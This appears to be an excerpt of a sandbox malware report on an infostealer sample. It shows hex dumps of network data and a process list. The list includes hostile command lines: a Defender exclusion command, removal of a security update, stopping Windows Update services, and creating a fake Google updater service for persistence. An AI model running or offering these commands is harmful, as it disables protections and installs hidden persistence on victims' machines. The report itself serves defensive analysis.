2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 90 b4 c3 0c 0f fb 46 dc 2f 68 9d 7e a5 0b 1c bb 09 26 b4 91 fb 05 bd d4 b5 fb 28 8f d2 01 c6 b3 fe 60 cc e0 7b 4b fe ec ac 66 7b fc 7d fa 16 54 6e 3a de 1b bc cc 24 84 53 fd 65 bb 7f c7 5b e2 74 af 38 84 84 ba ca 37 0c e7 ed 19 26 28 e9 b6 20 d4 8f c4 83 06 5c 84 d9 5b 27 3d 39 21 3f 43 6e cf 77 39 0f 22 25 95 c3 05 4b e2 4c 69 07 52 0a 8b 65 57 9e 10 1c 20 1d 79 19 d3 34 1b c5 22 6c 5a 8f 08 4d b5 3a dc 51 eb 73 21 17 12 38 dc 0d d1 20 2c 61 d9 0f fc 42 fe 40 05 aa f6 60 bc d5 f0 34 17 65 b8 cd a8 f1 39 42 d1 7f 92 c7 18 d6 0f 33 78 55 a9 46 32 17 14 57 e2 1c 03 fd 1a 30 d4 6f c6 83 96 40 19 8c 9d 37 14 4f ae 87 c8 4d cd 15 d7 93 0c 37 87 5d ec 2b bd fb b1 cd dc d1 54 cb 14 5d 1b 29 0d 03 d1 a4 24 ef 91 08 3d 53 4e 82 13 d2 42 cb 12 0f a6 f5 a1 74 61 96 Data Ascii: F/h~&(`{Kf{}Tn:$Se[t87&( \['=9!?Cnw9"%KLiReW y4"lZM:Qs!8 ,aB@`4e9B3xUF2W0o@7OM7]+T])$=SNBta
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 3b 66 82 2e dd 33 85 43 c3 14 81 4e 6c c7 86 59 b8 4a 0c 45 47 09 86 40 81 36 ab 51 a7 37 9c 02 45 d3 9e d4 c4 81 f7 a4 68 99 65 e9 70 9f 37 e8 52 b7 36 e3 40 98 1c e5 e4 54 b4 73 aa 6e a7 6f bc 02 a6 7e f3 39 8a 95 4c 5f a4 ca 60 65 f4 c0 93 49 e8 08 9b b4 2b 9a 91 9f 4f fa ae a1 d3 35 ac 4f ed b1 9a 5d d1 c8 b8 41 d6 09 08 8a c0 2a b9 bc eb 0f 8a 76 17 0a 48 7c ca 23 94 50 d4 05 91 ea 22 51 b9 a3 82 54 cf 59 9b 59 c8 22 89 54 80 33 74 47 ba cc 1c f5 5c a5 12 c4 b5 b7 29 dd 54 dc 1a cd 4c 67 ab 9f b9 3a 58 89 cc fc 12 98 b5 f3 55 91 08 d8 46 8e 19 f9 04 16 fc c0 7c 10 2e dc 74 b3 37 dd 68 b0 2b cc cf 89 ee d5 62 bd 9c 5a 90 29 a0 0a ba 72 c8 06 a4 49 29 35 fb 76 ed 36 92 f4 7a 0b ae c4 3c 89 75 2b 2e 8d 28 f0 76 87 3b e1 51 85 00 e3 bf 81 20 4e 0c 59 f4 Data Ascii: ;f.3CNlYJEG@6Q7Ehep7R6@Tsno~9L_`eI+O5O]A*vH\|#P"QTYY"T3tG\)TLg:XUF\|.t7h+bZ)rI)5v6z<u+.(v;Q NY
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 55 3c 0e 4d 9b e4 38 91 d5 14 48 64 bd 38 4b 96 8d f3 27 b6 70 ac 75 f9 fa ff d6 e5 78 39 0e 40 90 00 71 f7 00 a1 75 8c cb cd 3a 9d 8a c4 75 33 31 f1 7b c1 f8 0a b7 32 69 fb cf 2e 9b de 35 08 6a f4 46 9c 41 3c 5d 55 88 df e1 ed 1b 34 37 a0 87 d9 d5 41 4f f7 8c f5 93 21 3e 81 79 ff 2c b6 1b 39 28 f2 8e 04 55 41 bd de 75 9d 6d d7 74 b9 fc 15 d2 74 9b fa 30 d6 81 c5 7f f9 65 91 75 e9 83 18 dc d6 23 bc 82 41 93 21 d3 ce 7e 1f 1a 54 72 0a 00 6a 9b ea cf c2 77 df 29 e9 5b 16 14 8c 69 ee 36 6c 03 39 d7 98 77 24 e1 44 dc e7 cd 8e 7c df 39 c5 9f d4 29 8e 92 73 c8 d0 d4 e3 fc 24 1b 71 23 00 42 ce d3 74 9b fb ff ea 68 dd cf aa da 81 02 06 1e 21 75 0a c1 4a de a5 c1 38 20 e6 6d 85 26 ec 88 7b d7 e4 28 ff 04 c3 6e 17 ca 9f 61 f2 f8 c1 56 e3 3a 51 73 29 d6 9a ce 6a ce Data Ascii: U<M8Hd8K'pux9@qu:u31{2i.5jFA<]U47AO!>y,9(UAumtt0eu#A!~Trjw)[i6l9w$D\|9)s$q#Bth!uJ8 m&{(naV:Qs)j
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 8f e4 d4 05 e5 fc 10 e2 a8 09 26 ad 6b 14 c4 92 6b 07 29 a6 35 9d 2a ea da d8 56 9b bb c7 27 94 9b 0d e2 9c 77 e2 37 93 68 2c 3a 84 36 3b e0 90 bb 0b 24 c3 71 18 18 f8 c1 e7 15 b8 88 9b 15 58 7a f2 c3 f5 da e0 31 62 74 fc df 06 bb 39 23 b6 1f e2 d7 81 41 22 e1 f7 94 09 a5 f7 95 17 d3 bc 8a 08 19 82 53 db ba d1 8a 28 cb fc d2 03 38 25 7e d5 0d c3 6a f0 cf 68 d1 e4 12 bc 5f da f0 a7 1e 7c 14 95 0b 21 f4 e1 0f ec c6 8e 88 d1 cd af 57 bb d5 0e d1 ae f9 c2 89 2c 35 98 95 e8 24 ad 7b d4 3c 8d d9 28 cc 92 8e 03 c5 ee cc b8 b0 ee 96 ce d2 ad 15 8b 25 0b 6c 15 1a c5 a8 eb 3a c3 71 27 3a 79 b3 39 05 9e 50 2c 54 d1 99 7e d5 82 82 b9 75 f5 5d 2c 3a af 98 bc 42 9c 82 da 33 c3 96 7c d6 e4 49 ee 44 8a fb fd d1 d6 bf 1d 3f 9a c4 f1 0e 17 0e 99 c5 99 d1 e6 dc 74 0d bb 32 Data Ascii: &kk)5*V'w7h,:6;$qXz1bt9#A"S(8%~jh_\|!W,5${<(%l:q':y9P,T~u],:B3\|ID?t2
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 32 5e ad a2 63 23 c8 ff 9c 6b 3b 63 9a cc f5 45 71 da 25 d8 7e 82 ce c4 98 d1 cf a4 ce ce 46 41 8b 0d 30 e6 55 f1 de bb 83 ff 18 01 be ff a2 99 8e f5 0b a2 97 0a 75 3d 72 e5 14 d1 74 06 35 bf c4 ea 42 fb 8c 77 03 e5 bf ba 34 0b 6b fe 0d a0 36 e1 58 d5 be 00 cd 93 73 fa 29 94 b6 e5 da d1 17 b3 a1 61 d6 28 ff 7c 69 ff c3 f0 9b bb c9 a8 62 da c3 01 77 bc d2 0a 6e eb f4 bf 1b df 32 ec e7 dd 13 04 7d 96 13 b7 77 de cd f1 bf f5 da f9 08 5e df 9c 05 fd 36 7e 13 39 af 09 e0 09 ed 9b 97 09 f5 c2 7a 02 df a1 89 25 c3 f2 d6 24 c5 fb d3 d2 79 29 db 6e f5 fb cb 4c d5 44 9b 06 2b a1 f9 b8 47 cf 8a e2 ce 8e 77 02 f1 c1 70 34 d5 3e 60 f1 19 79 96 b9 80 ed d2 ba a7 85 3b 3b d2 90 7a fc 92 a1 77 d4 41 0b d7 da 39 75 e6 49 29 33 c1 5f f5 c1 1b e8 11 9a b9 b8 31 bf 86 51 b2 Data Ascii: 2^c#k;cEq%~FA0Uu=rt5Bw4k6Xs)a(\|ibwn2}w^6~9z%$y)nLD+Gwp4>`y;;zwA9uI)3_1Q
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: d3 f6 35 c3 c9 06 fc 61 ca f8 64 72 67 28 0e c5 92 18 01 a0 7b ad ff 44 1b e7 04 a1 31 d8 01 f9 65 fb 05 cd 55 fa 33 e5 69 dd 34 c7 92 b9 d1 e9 89 ee c9 9d 80 29 2d 07 5e 2f 6d a0 45 1a e9 41 89 cd d4 ce c1 b0 f5 a0 91 39 38 e9 1b fd d9 05 73 85 02 06 d8 14 29 ed 23 6e 33 a3 f9 e1 c9 01 cb 24 ff 05 89 7a dd c1 91 d3 e1 8b c5 f8 e6 81 6d 0a 41 90 d9 1f e0 14 1b cd 2b bc 08 5b 75 a9 7a 9b 3d ae 03 39 32 d5 70 fe f5 19 1b 98 f6 74 bf ec 3b 37 86 39 9d 8a 78 f3 9f 41 70 31 f6 42 20 ea 33 2e 0a b9 92 79 1b 17 61 41 d9 a3 eb 99 21 3c 1f ef 8d 24 f5 01 95 f1 bf 6f 03 f0 10 0a 03 79 2a c3 6a 79 6c a0 8f 09 02 bd 51 f1 c9 fa 63 da c6 0b cf 1f a6 7c af 38 cf f7 73 e0 51 fb 5d b9 75 92 5f df da a4 a1 0c f6 a3 bf 10 26 0a 93 cf 86 e1 fc f1 ff 14 ae 50 c3 93 c4 ef fb Data Ascii: 5adrg({D1eU3i4)-^/mEA98s)#n3$zmA+[uz=92pt;79xAp1B 3.yaA!<$oy*jylQc\|8sQ]u_&P
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: dd fa 0f d8 7e ea 1a 65 82 16 e0 91 6f 58 1a 13 bb 8e 75 bf c4 e6 e1 94 22 02 75 a2 d7 3b 75 a6 39 23 75 97 da 78 75 d0 65 df c6 90 7d f5 94 44 6c 7a bf c1 8a 39 c3 bd 01 75 75 d7 1b 39 c9 fa 97 5c 55 f4 af 5c 33 d6 1c d2 f6 be ce f3 e0 5a 1a 64 f5 63 7d 39 c8 5c c0 dc 19 95 1e 3d f5 9f e4 0a 06 61 8d 01 cb a1 85 cd d1 f2 95 65 13 f5 60 9a f6 c4 7f bc 05 a1 9b dd b0 c1 db e3 ce 00 69 e4 d9 ec c1 da 3d c5 79 09 a2 d1 9f 10 9d c2 62 eb e1 42 d7 e4 e4 41 67 00 24 06 8f a5 03 a2 70 ef e1 c2 9c f5 13 ac 56 bc 58 b7 ef 98 8f a4 fa 74 c7 93 93 ef 92 be 66 16 de 60 9b e8 3c ab 7f fd 10 c5 d9 b3 52 e1 a3 df 24 ae 54 27 40 45 8a b8 4f 62 bf 9a f5 84 52 e3 2f ad b9 4a d1 e3 7f 71 75 04 76 21 a0 49 bd f8 9c 41 fa b5 14 ba 1b e7 dc f2 d1 63 d8 68 1b 2c 2e a5 0c 10 72 Data Ascii: ~eoXu"u;u9#uxue}Dlz9uu9\U\3Zdc}9\=ae`i=ybBAg$pVXtf`<R$T'@EObR/Jquv!IAch,.r
2024-10-30 18:47:11 UTC	16384	IN	Data Raw: 7d f1 d2 4b 9b 35 f6 ef 5f e2 ae c1 77 01 32 14 97 0c 11 98 f3 b8 17 25 9b eb 76 ce 43 bc f9 be 17 93 a8 5b 9b fe f5 e2 6e 14 f5 06 db cd 03 a7 67 05 e0 84 7b e2 36 f0 75 d5 a4 da b8 d1 0a 8d 2b bc d0 b5 bb 22 d3 6c 72 f5 18 a6 e3 e6 76 02 6e 13 06 c0 a0 32 f5 04 d5 f0 d3 d2 89 f0 fd 8e da e3 de 44 9b e8 cf c2 96 9c 65 c9 6a f4 00 91 f7 e4 6d a4 6d 3d a7 98 63 ed f5 ab 78 0c cd c8 72 0f 09 f5 cb e1 29 98 da d7 ab 08 39 63 05 41 7a 2c bc 46 2e 5e cf a4 86 3e a6 71 69 02 d3 b4 67 be f2 f9 7b 94 18 0b 8d 2a c8 cf 87 f0 91 14 1b 92 fe c4 bd 39 41 45 d8 d9 67 9a 9b dd 76 8e 62 07 3d 71 6d d9 65 9f b8 24 23 fa 95 cc fc c1 78 30 c6 44 6c d1 d4 6f 9b e1 d7 e3 b2 f0 30 9c 15 1f cd 65 f7 38 cf ba 15 39 ff a0 cd 6a f5 f4 3a d0 f4 f5 7f f7 ed c1 4c 08 68 3c 1b 16 99 Data Ascii: }K5_w2%vC[ng{6u+"lrvn2Dejmm=cxr)9cAz,F.^>qig{*9AEgvb=qme$#x0Dlo0e89j:Lh<
2024-10-30 18:47:12 UTC	16384	IN	Data Raw: 9c 0d 85 05 69 2a 9d 41 8e f8 cb d4 47 3c dd 7e 5a b2 75 1e 15 39 0f c3 9c dc 0d 8e ab b3 d1 8f 5e 17 fb 41 9b e4 dd a2 9b ea 24 ec 86 46 3b af 9b 24 fa 1e 1b 13 ed 41 85 28 ca b1 9b 09 49 08 1d cf cf a5 6a 22 d3 53 f7 2e 27 45 d1 e2 6f 08 c4 f9 f6 fc c5 f5 e2 02 a8 4b f5 b7 8e f2 12 c5 16 25 fd 9f 7c 62 f5 ed b9 f4 05 06 60 01 5a ea 65 fd d9 05 85 0e 02 05 4f 2c cb a2 9c dc 9c f1 d3 f8 14 c2 77 f7 d4 e8 64 f3 90 d1 7a 6f 55 90 c1 bb 15 00 75 ee 39 1d b3 ae cc cb 7f 00 fe 45 cf dc 46 f1 55 5c 14 83 02 49 75 9a d6 f3 cd a6 a2 3c f5 9d 9c 27 71 03 79 e6 13 8f f0 a8 f5 97 c7 d4 e2 8d 8a 86 10 90 c6 86 dd c4 da e3 09 ec 8d f7 99 a7 9b fb f4 e3 bd 38 f0 07 e4 38 d5 9b 36 4c f5 e5 30 fa bd c1 31 1c d2 99 8e b1 c4 83 1d bc cf a7 93 d0 cb 73 17 39 e8 0f 9b f6 11 Data Ascii: i*AG<~Zu9^A$F;$A(Ij"S.'EoK%\|b`ZeO,wdzoUu9EFU\Iu<'qy886L01s9

Target ID:	0
Start time:	14:46:57
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\b4s45TboUL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b4s45TboUL.exe"
Imagebase:	0x400000
File size:	712'192 bytes
MD5 hash:	B6F6E51F0EFA952F3FFCAAB9DD5895DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:47:19
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:47:19
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:47:19
Start date:	30/10/2024
Path:	C:\ProgramData\HIIDGCGCBF.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\HIIDGCGCBF.exe"
Imagebase:	0x7ff68cba0000
File size:	8'662'936 bytes
MD5 hash:	0F247FC98A73243773ED3614FFAD3118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:47:20
Start date:	30/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:47:20
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:47:22
Start date:	30/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:47:22
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556
Imagebase:	0x9a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:47:22
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568
Imagebase:	0x9a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7fedf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff6ded10000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:47:23
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff79f0f0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff79f0f0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff79f0f0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff79f0f0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
